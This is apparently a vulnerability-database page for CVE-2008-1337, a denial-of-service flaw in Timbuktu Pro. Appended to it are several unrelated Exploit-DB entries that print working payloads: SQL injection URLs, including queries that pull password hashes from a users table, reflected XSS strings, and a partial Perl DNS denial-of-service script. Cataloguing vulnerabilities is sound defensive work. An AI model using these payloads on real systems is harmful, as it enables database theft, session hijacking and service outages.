CVE-2008-1337
published 2008-03-14CVE-2008-1337: The instant message service in Timbuktu Pro 8.6.5 RC 229 and earlier for Windows allows remote attackers to cause (1) a denial of service (daemon crash) via an…
PriorityP416medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
1.72%
74.6th percentile
The instant message service in Timbuktu Pro 8.6.5 RC 229 and earlier for Windows allows remote attackers to cause (1) a denial of service (daemon crash) via an invalid Version field or (2) a denial of service (CPU consumption and daemon termination) via an invalid or partial message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netopia | timbuktu_pro | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SunByte e-Flower - 'id' SQL Injection
exploitdb·2008-12-02
CVE-2008-5969 SunByte e-Flower - 'id' SQL Injection
SunByte e-Flower - 'id' SQL Injection
---
#===========================================================
#
# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
#
#===========================================================
#
# VENDOR: Sunbyte URL: http://www.sunbyte.net/
# APP: Sunbyte e-Flower (eCommerce webapp)
# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
# AUTHOR: W4RL0CK
# DATE: 29/11/08
# VULN.: SQL INJECTION
#
#
# WEBSITE: http://warlock.iblogger.org
# CONTACT: [email protected]
#
#===========================================================
#
# Expl0itin6:
#
# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
#
# Liv3 dEm0:
#
# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
#
#
#
# now, use
Exploit-DB
BoutikOne CMS - 'search_query' Cross-Site Scripting
exploitdb·2008-11-17
CVE-2008-5126 BoutikOne CMS - 'search_query' Cross-Site Scripting
BoutikOne CMS - 'search_query' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32321/info
BoutikOne CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search.php?lang=1&sort=Ref&search_query='">alert(1337)>XSS
Exploit-DB
GForge 4.5.19 - Multiple SQL Injections
exploitdb·2008-10-09
CVE-2008-6189 GForge 4.5.19 - Multiple SQL Injections
GForge 4.5.19 - Multiple SQL Injections
---
Gforge <= 4.5.19 Multiple Sql Injections
Vendor Notified: 2008-10-06
Note: should work regardless magic_quotes_gpc setting.
http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
Replace 1337 with a valid group_id:
http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
# milw0rm.com [2008-10-09]
Exploit-DB
Simple DNS Plus 5.0/4.1 - Remote Denial of Service
exploitdb·2008-07-13
CVE-2008-3208 Simple DNS Plus 5.0/4.1 - Remote Denial of Service
Simple DNS Plus 5.0/4.1 - Remote Denial of Service
---
#!/usr/bin/perl
# Simple DNS Plus 5.0/4.1
# Exploit written by Exodus.
# http://www.blackhat.org.il
use IO::Socket;
if(@ARGV ");
}
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");
$address = $ARGV[0];
$trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN
@parts = split(/\./,$address);
foreach $part (@parts)
{
$packedlen = pack("H2",sprintf("%02x",length($part)));
$address2 .= $packedlen.$part;
}
$query = $address2. "\000" . $type . $class;
$aname =
Exploit-DB
MyNews 1.6.x - 'hash' Cross-Site Scripting
exploitdb·2008-02-06
CVE-2008-0723 MyNews 1.6.x - 'hash' Cross-Site Scripting
MyNews 1.6.x - 'hash' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/27652/info
MyNews is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MyNews 1.6.4 and prior versions are vulnerable.
http://www.example.com/index.php?hash=">alert(1337);<!--&do=admin
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/timbuto-adv.txthttp://aluigi.org/poc/timbuto.ziphttp://secunia.com/advisories/29316http://securityreason.com/securityalert/3741http://www.securityfocus.com/archive/1/489360/100/0/threadedhttp://www.vupen.com/english/advisories/2008/0840http://aluigi.altervista.org/adv/timbuto-adv.txthttp://aluigi.org/poc/timbuto.ziphttp://secunia.com/advisories/29316http://securityreason.com/securityalert/3741http://www.securityfocus.com/archive/1/489360/100/0/threadedhttp://www.vupen.com/english/advisories/2008/0840
2008-03-14
Published